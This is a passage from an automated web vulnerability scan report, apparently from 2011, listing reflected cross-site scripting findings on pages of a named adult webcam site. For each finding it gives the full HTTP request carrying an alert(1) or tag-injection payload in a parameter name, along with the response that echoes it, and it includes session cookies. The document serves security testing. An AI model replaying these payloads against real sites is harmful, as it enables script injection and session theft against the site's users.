<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category_sub.aspx&he=imlive.com&ul=/live-sex-chats/cam-girls/categories/?145d0'-alert(1)-'7c612653421=1&qs=roomid=10&qs=roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.a
...[SNIP]...

2.73. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/cams-aroundthehouse/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f55"><a>53aa4db76a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/cams-aroundthehouse/?41f55"><a>53aa4db76a1=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:00 GMT
Connection: close
Content-Length: 33620
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/cams-aroundthehouse/?41f55"><a>53aa4db76a1=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.74. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cams-aroundthehouse/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1145a'-alert(1)-'9eeece25a26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cams-aroundthehouse/?1145a'-alert(1)-'9eeece25a26=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:16 GMT
Connection: close
Content-Length: 33767
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/aroundthehouse.aspx&he=imlive.com&ul=/live-sex-chats/cams-aroundthehouse/?1145a'-alert(1)-'9eeece25a26=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.75. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/caught-on-cam/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3af4"><a>c33137ced61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/caught-on-cam/?f3af4"><a>c33137ced61=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:56 GMT
Connection: close
Content-Length: 26092
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/caught-on-cam/?f3af4"><a>c33137ced61=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.76. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/caught-on-cam/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb9d8'-alert(1)-'484051df056 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/caught-on-cam/?cb9d8'-alert(1)-'484051df056=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:19 GMT
Connection: close
Content-Length: 26239
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/caughtoncam.aspx&he=imlive.com&ul=/live-sex-chats/caught-on-cam/?cb9d8'-alert(1)-'484051df056=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.77. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7330d'-alert(1)-'69a435aad31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/couple/?7330d'-alert(1)-'69a435aad31=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:18 GMT
Connection: close
Content-Length: 116890
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/couple/?7330d'-alert(1)-'69a435aad31=1&qs=cat=1^roomid=12^7330d'-alert(1)-'69a435aad31=1&qs=cat=1^roomid=12^7330d'-alert(1)-'69a435aad31=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.78. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f29d6"><a>e94ae201611 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/couple/?f29d6"><a>e94ae201611=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:09 GMT
Connection: close
Content-Length: 116726
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/couple/?f29d6"><a>e94ae201611=1">
...[SNIP]...

2.79. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb492'-alert(1)-'e05d7866c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/fetish/?eb492'-alert(1)-'e05d7866c6a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:57 GMT
Connection: close
Content-Length: 214380
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/fetish/?eb492'-alert(1)-'e05d7866c6a=1&qs=cat=1^roomid=13^eb492'-alert(1)-'e05d7866c6a=1&qs=cat=1^roomid=13^eb492'-alert(1)-'e05d7866c6a=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.80. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a68a0"><a>c6c73a2ee9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/fetish/?a68a0"><a>c6c73a2ee9a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:45 GMT
Connection: close
Content-Length: 214124
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/fetish/?a68a0"><a>c6c73a2ee9a=1">
...[SNIP]...

2.81. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/categories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ceae9'-alert(1)-'1ae32c8a8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/fetish/categories/?ceae9'-alert(1)-'1ae32c8a8a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
